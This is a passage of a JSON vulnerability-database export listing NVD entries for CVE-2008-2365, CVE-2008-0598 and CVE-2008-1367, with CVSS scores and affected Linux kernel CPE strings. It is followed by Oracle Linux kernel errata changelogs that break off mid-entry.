"cpe:2.3:o:linux:linux_kernel:2.4.27:pre1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.11:*:*:*:*:*:*:*", "cpe:2.3:o:debian:debian_linux:4.0:*:ia-64:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.18:pre3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.19:pre3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.4.27:pre2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc2:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:50:59", "description": "Race condition in the ptrace and utrace support in the Linux kernel 2.6.9 through 2.6.25, as used in Red Hat Enterprise Linux (RHEL) 4, allows local users to cause a denial of service (oops) via a long series of PTRACE_ATTACH ptrace calls to another user's process that trigger a conflict between utrace_detach and report_quiescent, related to \"late ptrace_may_attach() check\" and \"race around &dead_engine_ops setting,\" a different vulnerability than CVE-2007-0771 and CVE-2008-1514. NOTE: this issue might only affect kernel versions before 2.6.16.x.", "edition": 3, "cvss3": {}, "published": "2008-06-30T21:41:00", "title": "CVE-2008-2365", "type": "cve", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:N/I:N/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-2365"], "modified": "2018-10-30T16:25:00", "cpe": ["cpe:/o:linux:linux_kernel:2.6.20.9", "cpe:/o:linux:linux_kernel:2.6.12.22", "cpe:/o:linux:linux_kernel:2.6.18.1", "cpe:/o:linux:linux_kernel:2.6.22.3", "cpe:/o:linux:linux_kernel:2.6.23_rc1", "cpe:/o:linux:linux_kernel:2.6.19.1", "cpe:/o:linux:linux_kernel:2.6.15.2", "cpe:/o:linux:linux_kernel:2.6.22.15", "cpe:/o:linux:linux_kernel:2.6.23.1", "cpe:/o:linux:linux_kernel:2.6.21", "cpe:/o:linux:linux_kernel:2.6.14.4", "cpe:/o:linux:linux_kernel:2.6.22.16", "cpe:/o:linux:linux_kernel:2.6.16.9", "cpe:/o:linux:linux_kernel:2.6.11.7", "cpe:/o:linux:linux_kernel:2.6.11.8", "cpe:/o:linux:linux_kernel:2.6.25.3", "cpe:/o:linux:linux_kernel:2.6.12.3", "cpe:/o:linux:linux_kernel:2.6.14.1", "cpe:/o:linux:linux_kernel:2.6.24.1", "cpe:/o:linux:linux_kernel:2.6.23.2", "cpe:/o:linux:linux_kernel:2.6.24.2", "cpe:/o:linux:linux_kernel:2.6.12", "cpe:/o:linux:linux_kernel:2.6.21.1", "cpe:/o:linux:linux_kernel:2.6.23.9", "cpe:/o:linux:linux_kernel:2.6.21.7", "cpe:/o:linux:linux_kernel:2.6.23.14", "cpe:/o:linux:linux_kernel:2.6.22.1", "cpe:/o:linux:linux_kernel:2.6.17.11", "cpe:/o:linux:linux_kernel:2.6.14", "cpe:/o:linux:linux_kernel:2.6.16.27", "cpe:/o:linux:linux_kernel:2.6.22.11", "cpe:/o:linux:linux_kernel:2.6.17.2", "cpe:/o:linux:linux_kernel:2.6.11.11", "cpe:/o:linux:linux_kernel:2.6.23", "cpe:/o:linux:linux_kernel:2.6.19", "cpe:/o:linux:linux_kernel:2.6.12.5", "cpe:/o:linux:linux_kernel:2.6.21.6", "cpe:/o:linux:linux_kernel:2.6.17.1", "cpe:/o:linux:linux_kernel:2.6.20.15", "cpe:/o:linux:linux_kernel:2.6.23.10", "cpe:/o:linux:linux_kernel:2.6.13", "cpe:/o:linux:linux_kernel:2.6.14.5", "cpe:/o:linux:linux_kernel:2.6.24_rc4", "cpe:/o:linux:linux_kernel:2.6.20.11", "cpe:/o:linux:linux_kernel:2.6.23.6", "cpe:/o:linux:linux_kernel:2.6.19.2", "cpe:/o:linux:linux_kernel:2.6.17.10", "cpe:/o:linux:linux_kernel:2.6.16.19", "cpe:/o:linux:linux_kernel:2.6.15.1", "cpe:/o:linux:linux_kernel:2.6.23.7", "cpe:/o:linux:linux_kernel:2.6.20", "cpe:/o:linux:linux_kernel:2.6.22.7", "cpe:/o:linux:linux_kernel:2.6.25.1", "cpe:/o:linux:linux_kernel:2.6.22.4", "cpe:/o:linux:linux_kernel:2.6.18", "cpe:/o:linux:linux_kernel:2.6.25.5", "cpe:/o:linux:linux_kernel:2.6.20.8", "cpe:/o:linux:linux_kernel:2.6.14.2", "cpe:/o:linux:linux_kernel:2.6.16.12", "cpe:/o:linux:linux_kernel:2.6.23.5", "cpe:/o:linux:linux_kernel:2.6.17.13", "cpe:/o:linux:linux_kernel:2.6.12.1", "cpe:/o:linux:linux_kernel:2.6.20.3", "cpe:/o:linux:linux_kernel:2.6.14.3", "cpe:/o:linux:linux_kernel:2.6.24.6", "cpe:/o:linux:linux_kernel:2.6.16.1", "cpe:/o:linux:linux_kernel:2.6.17.3", "cpe:/o:linux:linux_kernel:2.6.22.12", "cpe:/o:linux:linux_kernel:2.6.21.4", "cpe:/o:linux:linux_kernel:2.6.18.3", "cpe:/o:linux:linux_kernel:2.6.22", "cpe:/o:linux:linux_kernel:2.6.13.2", "cpe:/o:linux:linux_kernel:2.6.22.5", "cpe:/o:linux:linux_kernel:2.6.24_rc5", "cpe:/o:linux:linux_kernel:2.6.9", "cpe:/o:linux:linux_kernel:2.6.20.2", "cpe:/o:linux:linux_kernel:2.6.10", "cpe:/o:linux:linux_kernel:2.6.17.8", "cpe:/o:linux:linux_kernel:2.6.11.12", "cpe:/o:linux:linux_kernel:2.6.11", "cpe:/o:linux:linux_kernel:2.6.15.3", "cpe:/o:linux:linux_kernel:2.6.17.14", "cpe:/o:linux:linux_kernel:2.6.16.7", "cpe:/o:linux:linux_kernel:2.6.23.4", "cpe:/o:linux:linux_kernel:2.6.15.4", "cpe:/o:linux:linux_kernel:2.6.20.5", "cpe:/o:linux:linux_kernel:2.6.11.6", "cpe:/o:linux:linux_kernel:2.6.17.12", "cpe:/o:linux:linux_kernel:2.6.17", "cpe:/o:linux:linux_kernel:2.6.20.4", "cpe:/o:redhat:enterprise_linux_desktop:4.0", "cpe:/o:linux:linux_kernel:2.6.25", "cpe:/o:linux:linux_kernel:2.6.13.4", "cpe:/o:linux:linux_kernel:2.6.11.4", "cpe:/o:linux:linux_kernel:2.6.12.4", "cpe:/o:linux:linux_kernel:2.6.16", "cpe:/o:linux:linux_kernel:2.6.22.8", "cpe:/o:linux:linux_kernel:2.6.25.4", "cpe:/o:linux:linux_kernel:2.6.15.11", "cpe:/o:linux:linux_kernel:2.6.24", "cpe:/o:linux:linux_kernel:2.6.15", "cpe:/o:linux:linux_kernel:2.6.17.7", "cpe:/o:linux:linux_kernel:2.6.18.4", "cpe:/o:linux:linux_kernel:2.6.12.12", "cpe:/o:linux:linux_kernel:2.6.11.5", "cpe:/o:linux:linux_kernel:2.6.12.6", "cpe:/o:linux:linux_kernel:2.6.25.2", "cpe:/o:linux:linux_kernel:2.6.17.6", "cpe:/o:linux:linux_kernel:2.6.22.14", "cpe:/o:linux:linux_kernel:2.6.22.13", "cpe:/o:linux:linux_kernel:2.6.22.17", "cpe:/o:linux:linux_kernel:2.6.20.1", "cpe:/o:linux:linux_kernel:2.6.13.1", "cpe:/o:linux:linux_kernel:2.6.12.2", "cpe:/o:linux:linux_kernel:2.6.20.13", "cpe:/o:linux:linux_kernel:2.6.16.11", "cpe:/o:linux:linux_kernel:2.6.17.5", "cpe:/o:linux:linux_kernel:2.6.16.23", "cpe:/o:linux:linux_kernel:2.6.23.3", "cpe:/o:linux:linux_kernel:2.6.13.3", "cpe:/o:linux:linux_kernel:2.6.21.2", "cpe:/o:linux:linux_kernel:2.6.16.13", "cpe:/o:linux:linux_kernel:2.6.22.6", "cpe:/o:redhat:enterprise_linux:4.0"], "id": "CVE-2008-2365", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-2365", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:N/I:N/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.6.23.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.24:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.15:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.24.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.12:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:4.0:*:as:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.22:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.25.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.24:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.24.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.24:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.25.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.17:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.25.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23_rc1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.25.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.27:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:4.0:*:es:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_desktop:4.0:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.25:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc6:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.24.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.10:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc3:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18.3:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.24_rc4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:rc2:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.7:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:4.0:*:ws:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13:rc7:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.6:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.22.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.24_rc5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.13.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.8:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.15.2:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.23:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:rc4:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:rc5:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.12:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.21:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.5:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.11.4:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.25.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16:rc1:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.12.1:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.17.13:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.20.11:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.16.19:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.14:rc2:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:50:57", "description": "Unspecified vulnerability in the 32-bit and 64-bit emulation in the Linux kernel 2.6.9, 2.6.18, and probably other versions allows local users to read uninitialized memory via unknown vectors involving a crafted binary.", "edition": 3, "cvss3": {}, "published": "2008-06-30T22:41:00", "title": "CVE-2008-0598", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.9, "vectorString": "AV:L/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-0598"], "modified": "2017-09-29T01:30:00", "cpe": ["cpe:/o:linux:linux_kernel:2.6.18", "cpe:/o:linux:linux_kernel:2.6.9"], "id": "CVE-2008-0598", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-0598", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:2.6.9:*:*:*:*:*:*:*", "cpe:2.3:o:linux:linux_kernel:2.6.18:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:50:58", "description": "gcc 4.3.x does not generate a cld instruction while compiling functions used for string manipulation such as memcpy and memmove on x86 and i386, which can prevent the direction flag (DF) from being reset in violation of ABI conventions and cause data to be copied in the wrong direction during signal handling in the Linux kernel, which might allow context-dependent attackers to trigger memory corruption. NOTE: this issue was originally reported for CPU consumption in SBCL.\nSubscription required to access Link 1014774", "edition": 3, "cvss3": {}, "published": "2008-03-17T23:44:00", "title": "CVE-2008-1367", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": true}, "cvelist": ["CVE-2008-1367"], "modified": "2017-09-29T01:30:00", "cpe": ["cpe:/a:gnu:gcc:4.3"], "id": "CVE-2008-1367", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-1367", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:gnu:gcc:4.3:*:*:*:*:*:*:*"]}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:13", "bulletinFamily": "unix", "cvelist": ["CVE-2008-0598", "CVE-2008-2729", "CVE-2008-2358", "CVE-2008-1673"], "description": "[2.6.18-92.1.6.0.2.el5]\n- [NET] Add entropy support to e1000 and bnx2 (John Sobecki) [orabug 6045759]\n- [splice] Fix bad unlock_page() in error case (Jens Axboe) [orabug 6263574]\n- [dio] fix error-path crashes (Linus Torvalds) [orabug 6242289]\n- [NET] fix netpoll race (Tina Yang) [orabugz 5791]\n[2.6.18-92.1.6.el5]\n- [x86] sanity checking for read_tsc on i386 (Brian Maly ) [447686 443435]\n[2.6.18-92.1.5.el5]\n- [x86_64] copy_user doesn't zero tail bytes on page fault (Vitaly Mayatskikh) [451275 451276] {CVE-2008-2729}\n[2.6.18-92.1.4.el5]\n- Revert: [misc] ttyS1 loses interrupt and stops transmitting (Simon McGrath ) [443071 440121]\n[2.6.18-92.1.3.el5]\n- [x86_64] fix possible data leaks in copy_from_user() routine (Anton Arapov ) [433944 433945] {CVE-2008-0598}\n[2.6.18-92.1.2.el5]\n- [misc] ttyS1 loses interrupt and stops transmitting (Simon McGrath ) [443071 440121]\n- [net] DCCP sanity check feature length (Anton Arapov ) [447395 447396] {CVE-2008-2358}\n- [misc] fix possible buffer overflow in ASN.1 parsing routine (Anton Arapov ) [444464 444465] {CVE-2008-1673}", "edition": 4, "modified": "2008-06-26T00:00:00", "published": "2008-06-26T00:00:00", "id": "ELSA-2008-0519", "href": "http://linux.oracle.com/errata/ELSA-2008-0519.html", "title": "kernel security and bug fix update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:35", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2136", "CVE-2007-5904", "CVE-2008-0004", "CVE-2008-2826", "CVE-2008-1669", "CVE-2008-0001", "CVE-2008-0598", "CVE-2005-0504", "CVE-2007-6151", "CVE-2008-1375", "CVE-2007-4997", "CVE-2008-0007", "CVE-2008-2729", "CVE-2006-4145", "CVE-2007-6206", "CVE-2008-1367", "CVE-2007-6063", "CVE-2008-2812", "CVE-2007-5500", "CVE-2008-1673", "CVE-2007-4130"], "description": "[2.6.9-78]\n-alsa: Fix mic not working for HP XW series (Brian Maly) [453783]\n[2.6.9-77]\n-alsa: Add missing quirks for alc262 (Brian Maly) [453783]\n-Revert 'i8042: remove polling timer support - Original bz 246233' (Vivek Goyal) [450918]\n[2.6.9-76]\n-tty: fix tty holes (Vivek Goyal) [453155] {CVE-2008-2812}\n-xen: fix use of pvdisk or blkfront or xen-vbd for boot device (Don Dutile) [452210]\n-ppc64: fix restore of vmx registers in signal return (Brad Peters) [403471]\n-pci: correct pci bus assignments (Pete Zaitcev) [181648]\n-Fix diskdump failure on new mpt fusion driver (Chip Coldwell) [268921]\n[2.6.9-75]\n-mptfusion: Fix regression where commands timeout when issuing host reset to mpt fusion hba (Chip Coldwell) [452265]\n-copy_user_generic_c does not zero bytes left at destination after GPF (Vitaly Mayatskikh) [451274] {CVE-2008-2729}\n-sctp: make sure length argument passed does not overflow (Neil Horman) [452480] {CVE-2008-2826}\n-[infiniband] ehca: fixes lost interrupts problem over ib ehca after lpar to lpar communication (Brad Peters) [450689]\n-cifs: don t allow demultiplex thread to exit until kthread_stop is called (Jeff Layton) [442789]\n-Fix copy_from_user vulnerability (Vitaly Mayatskikh) [433943] {CVE-2008-0598}\n-Revert 'Enable fb_radeon driver on ppc64' (Vivek Goyal) [350931]\n[2.6.9-74]\n-[xen] pv on hvm: Fix cant open /dev/xvda while probing disks during installation issue (Don Dutile) [447315]\n-bnx2x: correct chip reset (Andy Gospodarek) [328001]\n-Fix race in switch_uid (Vince Worthington) [441282]\n[2.6.9-73]\n-Add more PCI IDs to support hdmi audio on amd chipsets (Bhavana Nagendra) [428964]\n-powernow k8: Repost to fix unnecessary error messages with synchronized p state transitions (Ed Pollard) [276771]\n-[usb] ohci-hcd: Fix kernel failed to boot and dropped to xmon on ppc64 (Vitaly Mayatskikh) [443052]\n-bonding: Fix interface flags issue (Andy Gospodarek) [442124]\n-qla4xxx: fix time outs, syncronization and re-logins (Marcus Barrow) [437898]\n-qla2xxx: update version to 8.02.09-d0-rhel4.7-04 (Marcus Barrow) [450645]\n-qla2xxx: correct srb usage after completion free issues resulting in slab corruption (Marcus Barrow) [450645]\n-qla2xxx: add 4 and 8 gb to port speed reporting (Marcus Barrow) [450645]\n-qla2xxx: add isp85xx in some ioctl paths for nvram and flash handling (Marcus Barrow) [450645]\n-qla2xxx: fix debug messages (Marcus Barrow) [450645]\n-qla2xxx: allocated firmware dump space for isp85xx (Marcus Barrow) [450645]\n-qla2xxx: correct isp84xx verify chip response handling (Marcus Barrow) [450645]\n-qla2xxx: add isp84xx to list of optionrom layout ids (Marcus Barrow) [450645]\n-qla2xxx: correct isp84xx 